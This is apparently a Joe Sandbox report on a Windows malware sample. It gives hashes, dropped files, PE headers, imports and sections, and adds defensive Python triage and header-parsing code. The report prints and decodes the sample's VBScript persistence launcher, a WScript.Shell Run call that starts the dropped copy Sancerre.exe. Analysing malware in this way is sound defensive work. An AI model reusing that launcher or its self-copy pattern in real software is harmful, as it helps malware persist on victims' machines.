                                                                                                          SSDEEP:1536:9auLLR0FbFtdxC4EBIinzDNYhtpLuByhiqaqcX1BaZW5tHbXpLjCrM/fuBXkBTKY:9fobFbM4EBzups1gW/JCM/gXwTpb/q/O
                                                                                                          MD5:FA5A3A7EF55BB5C2607645FA1294FD1F
                                                                                                          SHA1:7D9F421E18A5F83920655BA70369B48842876829
                                                                                                          SHA-256:435C4B5837DA8AB542CDFF3CB78E17A818379BC988C80F55E27A78926548993A
                                                                                                          SHA-512:A75441FCAC4AD54B9504DC52B349AC36335FCE7609E196C3A1BCAAD51CED1877F3B271471D9ECC7E9D356EF741660C3FB244E0639F6F8A682069E303152B61D8
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:EA06..<....TI.B.V...t..&c1..f.9.R.5..T..i9.Q&`....x..3....j`....x.......u..c......[...Y..{>..b....?......yX..'.....t.V......:..-f....`.y......@....M...-..G..K.P..Zn.j..*.<K*...j.3..K.....-........j..i.......hu....i..U..,H.4._...w...u^.Q....6.mT..xd.;.....5:...{...j.{.<..KR.......L.D.....G..-|6P.b.>....D...xK...L..x....>...!i.T.u..&m=....n.<].....&m1..Z|q....z..<.9.Z.c.L*..]J.Y..3..._.........x.}W...Vh.m(..)...6a9...jZ.xE.-1P....`...xD......$.Z*..E....-....x.xW..3N.G.R....V...T.L.c....9.{.4......i3....9,N.3..f...^E...f ....y.....m>a...&3.D...<Qf..}r.P....4n.G.Oi.=&k.Uj3yDb.E...u.eR5b.Q.:..+7..f....g..;.......S+Q....D..-.h.M......+M..(...j.R.l'3...3r..&............3T...=..2.4.F.@.b.7..g....kx..b4.5.kW...*t....T-.JMl....cw.|.g2.[.....P.L"U.tF]P.M.q...)O...38...X..-..NqD..*5j=2....Fo9.Oh.Z.j.v.S...D....M.[_.mO........-....,...4...C..n.I.F|.:..7..Qfu;...R.p.5.t.D...:-.eL.....%R.N..T...i9.X.7..^oE....H.,....$...N...Z.8%.c..Q...*.@...Y.>L..\:..:C,.Q&
                                                                                                          Process:C:\Users\user\Desktop\AHSlIDftf1.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1109504
                                                                                                          Entropy (8bit):6.9554910707129105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8apy1OcKWb:KTvC/MTQYxsWR7apy1OcK
                                                                                                          MD5:6A0297E362831D810A049E0EF860147E
                                                                                                          SHA1:0D5D32CA2B5E36FCC209A7FC6EE12EFBF3CF572F
                                                                                                          SHA-256:E66DC1E184E0838C2C811BEBC1780A4E17C0E005AF799ECFEBC4868664B94A0F
                                                                                                          SHA-512:CC4B91E47A2D5B7A8B01CA973646D7342671C0497A59FFBD493DC5AC74DBFBB4940B443DF064ED6E26C0E5011FAF63562C6290055C5EFE6463689971C936B3CA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....bg.........."..........>......w.............@..........................P............@...@.......@.....................d...|....@..<........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...<....@......................@..@.reloc...u.......v...x..............@..B........................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\konked\Sancerre.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):270
                                                                                                          Entropy (8bit):3.403985785911199
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Ol+HafDdnriIM8lfQVn:DsO+vNloRKQ1rHiRmA2n
                                                                                                          MD5:94657BBF7F65C76FD12F61EE36B42590
                                                                                                          SHA1:78836B34CFACD20A1F3F1A57B8C6ED3F6A66E324
                                                                                                          SHA-256:1FF228A10AAF28969B108BFEEA92DBAEC1AA18C5DD8372E5B447720D3B40E89F
                                                                                                          SHA-512:EA5C80EA800EA30594A237BAB00DBDCEA36CDCCD9D4EBD20812191368CD20A165A7465E83E2699069939CD73802C1467F2E3DD31248DCCC6D6BF26B173B9C5E9
                                                                                                          Malicious:true
                                                                                                          Reputation:low
                                                                                                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.o.n.k.e.d.\.S.a.n.c.e.r.r.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
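The dropped-file records above carry three things worth pulling out: a PE whose hashes are identical to the submitted sample (the sample copies itself, and the script below names the copy as C:\Users\...\konked\Sancerre.exe), a 132122-byte untyped blob at 7.94 bits/byte written by both the original sample and Sancerre.exe, and a 270-byte script whose preview is UTF-16LE text (the '.' after every letter is a NUL byte). Decoded, the script is a WScript.Shell Run call launching C:\Users\jones\AppData\Local\konked\Sancerre.exe; the username baked into that path (jones) is not the sandbox user (user) seen in every Process field. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: the record values are copied from the report, the script bytes are rebuilt from the preview and are an assumption (checked against the reported 270-byte size and 3.40 entropy), and the 7.5 bits/byte threshold is an arbitrary choice.

```python
"""Triage of the dropped-file records listed in this report.

Added example, not Joe Sandbox or sample code. Hash, size, entropy and
process values are copied from the report; the VBS bytes are rebuilt from
the report's preview and are an assumption, checked against the reported
size (270 bytes) and entropy (3.40).
"""
import hashlib
import math
import re
from collections import Counter, defaultdict

# SHA-256 of the submitted sample, as reported.
SUBMITTED_SHA256 = "e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f"

# Dropped-file records from the report (constructed subset, values verbatim).
DROPPED = [
    {"process": r"C:\Users\user\Desktop\AHSlIDftf1.exe", "type": "data",
     "size": 277504, "entropy": 6.975942575675689,
     "sha256": "dc2c4aebfb035311a24d8e274417684bda6ead097aacf6cc9b19d7d2f64aac8a"},
    {"process": r"C:\Users\user\AppData\Local\konked\Sancerre.exe", "type": "data",
     "size": 132122, "entropy": 7.93957243489196,
     "sha256": "435c4b5837da8ab542cdff3cb78e17a818379bc988c80f55e27a78926548993a"},
    {"process": r"C:\Users\user\Desktop\AHSlIDftf1.exe", "type": "data",
     "size": 132122, "entropy": 7.93957243489196,
     "sha256": "435c4b5837da8ab542cdff3cb78e17a818379bc988c80f55e27a78926548993a"},
    {"process": r"C:\Users\user\Desktop\AHSlIDftf1.exe",
     "type": "PE32 executable (GUI) Intel 80386, for MS Windows",
     "size": 1109504, "entropy": 6.9554910707129105,
     "sha256": "e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f"},
    {"process": r"C:\Users\user\AppData\Local\konked\Sancerre.exe", "type": "data",
     "size": 270, "entropy": 3.403985785911199,
     "sha256": "1ff228a10aaf28969b108bfeea92dbaec1aa18c5dd8372e5b447720d3b40e89f"},
]

# The 270-byte script, rebuilt from the preview: every visible character is
# followed by a NUL, i.e. UTF-16LE with no BOM, and lines end in a bare LF.
VBS_TEXT = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\jones\\AppData\\Local\\konked\\Sancerre.exe", 1\n'
    'Set WshShell = Nothing\n'
)
VBS_BYTES = VBS_TEXT.encode("utf-16-le")


def shannon_entropy(data):
    """Bits per byte, the measure behind the report's 'Entropy (8bit)' field."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def decode_script(blob):
    """Decode a dropped script; a NUL at nearly every odd offset means UTF-16LE."""
    odd = blob[1::2]
    if odd and odd.count(0) > 0.9 * len(odd):
        return blob.decode("utf-16-le")
    return blob.decode("utf-8", errors="replace")


WSH_RUN = re.compile(r'WshShell\.Run\s+"([^"]+)"', re.IGNORECASE)


def wsh_run_target(blob):
    """Path launched by the script's WScript.Shell Run call, or None."""
    m = WSH_RUN.search(decode_script(blob))
    return m.group(1) if m else None


def profile_user(path):
    """Username baked into a C:\\Users\\<name>\\... path, or None."""
    m = re.match(r"(?i)[a-z]:\\users\\([^\\]+)\\", path)
    return m.group(1) if m else None


def self_copies(records, submitted_sha256):
    """Dropped files byte-identical to the submitted sample (self-copy for persistence)."""
    return [r for r in records if r["sha256"].lower() == submitted_sha256.lower()]


def packed_payloads(records, threshold=7.5):
    """Untyped blobs near 8 bits/byte: encrypted or compressed stages worth unpacking."""
    return [r for r in records if r["type"] == "data" and r["entropy"] >= threshold]


def shared_blobs(records):
    """SHA-256 -> writer processes, for content written by more than one process."""
    writers = defaultdict(set)
    for r in records:
        writers[r["sha256"]].add(r["process"])
    return {h: procs for h, procs in writers.items() if len(procs) > 1}


if __name__ == "__main__":
    print("script: %d bytes, entropy %.3f, md5 %s" % (
        len(VBS_BYTES), shannon_entropy(VBS_BYTES), hashlib.md5(VBS_BYTES).hexdigest()))
    target = wsh_run_target(VBS_BYTES)
    print("persistence target:", target, "| embedded user:", profile_user(target),
          "| sandbox user:", profile_user(DROPPED[4]["process"]))
    for r in self_copies(DROPPED, SUBMITTED_SHA256):
        print("self-copy of the sample written by", r["process"])
    for r in packed_payloads(DROPPED):
        print("high-entropy blob %s (%d bytes) from %s" % (r["sha256"][:12], r["size"], r["process"]))
    for h, procs in shared_blobs(DROPPED).items():
        print("blob %s written by %d processes" % (h[:12], len(procs)))
```

The entropy of the rebuilt script comes out at 3.40 bits/byte, the half-NUL UTF-16 layout accounting for most of the low figure; the MD5 the script prints can be compared against the 94657BBF... value in the record to confirm the reconstruction byte for byte.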
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.9554910707129105
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:AHSlIDftf1.exe
                                                                                                          File size:1'109'504 bytes
                                                                                                          MD5:6a0297e362831d810a049e0ef860147e
                                                                                                          SHA1:0d5d32ca2b5e36fcc209a7fc6ee12efbf3cf572f
                                                                                                          SHA256:e66dc1e184e0838c2c811bebc1780a4e17c0e005af799ecfebc4868664b94a0f
                                                                                                          SHA512:cc4b91e47a2d5b7a8b01ca973646d7342671c0497a59ffbd493dc5ac74dbfbb4940b443df064ed6e26c0e5011faf63562c6290055c5efe6463689971c936b3ca
                                                                                                          SSDEEP:24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8apy1OcKWb:KTvC/MTQYxsWR7apy1OcK
                                                                                                          TLSH:8A35AF027391C062FFAB92334F5AF6515BBC69260123E61F13981D7ABE701B1563E7A3
                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                                          Icon Hash:aaf3e3e3938382a0
                                                                                                          Entrypoint:0x420577
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x676284A7 [Wed Dec 18 08:15:35 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:948cc502fe9226992dce9417f952fce3
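The static fields above (time stamp 0x676284A7, image file characteristics, entry point, image base, subsystem, DLL characteristics) are read straight from the COFF file header and the PE32 optional header; the DLL characteristics list DYNAMIC_BASE and TERMINAL_SERVER_AWARE but not NX_COMPAT. The Python below is an added example, not Joe Sandbox or sample code: build_header() constructs a stand-in PE32 header carrying the reported values (an assumption; the real sample's remaining header fields are not reproduced), and parse_pe_header() is a plain stdlib PE32 parser that can equally be pointed at the actual file.

```python
"""Recomputing this report's static PE fields from the raw headers.

Added example, not Joe Sandbox or sample code. build_header() constructs a
stand-in PE32 header carrying the values the report lists (an assumption:
the real sample's other header fields are not reproduced); parse_pe_header()
is a generic PE32 parser that can be pointed at the real file's bytes.
"""
import struct
from datetime import datetime, timezone

# Values as listed under the report's static information.
REPORT_TIMESTAMP = 0x676284A7
REPORT_CHARACTERISTICS = 0x0002 | 0x0020 | 0x0100   # EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
REPORT_ENTRYPOINT = 0x420577
REPORT_IMAGEBASE = 0x400000
REPORT_SUBSYSTEM = 2                                # windows gui
REPORT_DLL_CHARACTERISTICS = 0x0040 | 0x8000        # DYNAMIC_BASE, TERMINAL_SERVER_AWARE

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
                        0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
                       0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def flag_names(value, table):
    """Names of the bits set in value, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def build_header(timestamp=REPORT_TIMESTAMP, characteristics=REPORT_CHARACTERISTICS,
                 entrypoint=REPORT_ENTRYPOINT, imagebase=REPORT_IMAGEBASE,
                 subsystem=REPORT_SUBSYSTEM, dll_characteristics=REPORT_DLL_CHARACTERISTICS):
    """Constructed minimal PE32 header: DOS header, PE signature, COFF header, 96-byte optional header."""
    e_lfanew = 0x40
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine i386, 0 sections, TimeDateStamp, no symbols, 96-byte optional header, Characteristics.
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 96, characteristics)
    # Magic 0x10B, linker 14.0, code/data sizes, AddressOfEntryPoint, BaseOfCode, BaseOfData,
    # ImageBase, SectionAlignment, FileAlignment.
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entrypoint, 0x1000, 0, imagebase, 0x1000, 0x200)
    opt += struct.pack("<HHHHHH", 5, 1, 5, 1, 5, 1)      # OS, image and subsystem version 5.1
    opt += struct.pack("<IIII", 0, 0x1000, 0x400, 0)      # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
    opt += struct.pack("<HH", subsystem, dll_characteristics)
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 0)  # stack, heap, LoaderFlags, NumberOfRvaAndSizes
    return dos + b"PE\0\0" + coff + opt


def parse_pe_header(data):
    """Read the COFF and PE32 optional header fields that the report's static section shows."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _symtab, _nsyms, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (0x10B) optional headers handled here")
    entrypoint, = struct.unpack_from("<I", data, opt + 16)
    imagebase, = struct.unpack_from("<I", data, opt + 28)
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "machine": hex(machine),
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "entrypoint": entrypoint,
        "imagebase": imagebase,
        "os_version": "%d.%d" % (os_major, os_minor),
        "subsystem": SUBSYSTEMS.get(subsystem, hex(subsystem)),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "aslr": bool(dll_chars & 0x0040),
        "nx_compat": bool(dll_chars & 0x0100),
    }


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_header()
    for key, value in parse_pe_header(data).items():
        print("%-20s %s" % (key, value))
```

Run without arguments it parses the constructed header and prints the report's values back, including the Wed Dec 18 08:15:35 2024 UTC time stamp; run with a path it parses that file. The aslr and nx_compat booleans are the two mitigation opt-ins most worth checking on a dropped PE, and on this sample only the first is set.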
                                                                                                          Instruction
                                                                                                          call 00007F7784C7BEA3h
                                                                                                          jmp 00007F7784C7B7AFh
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
                                                                                                          push dword ptr [ebp+08h]
                                                                                                          mov esi, ecx
                                                                                                          call 00007F7784C7B98Dh
                                                                                                          mov dword ptr [esi], 0049FDF0h
                                                                                                          mov eax, esi
                                                                                                          pop esi
                                                                                                          pop ebp
                                                                                                          retn 0004h
                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                          mov eax, ecx
                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                                                          ret
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          push esi
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729

Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x3823c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10d000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x3823c | 0x38400 | e9ed31415c60d1c956dccab2c93fe4e4 | False | 0.8819618055555556 | data | 7.7842250713721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10d000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x2f501 | data | | | 1.0003405695768166
RT_GROUP_ICON | 0x10bcbc | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10bd34 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10bd48 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10bd5c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10bd70 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10be4c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
Imports:
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
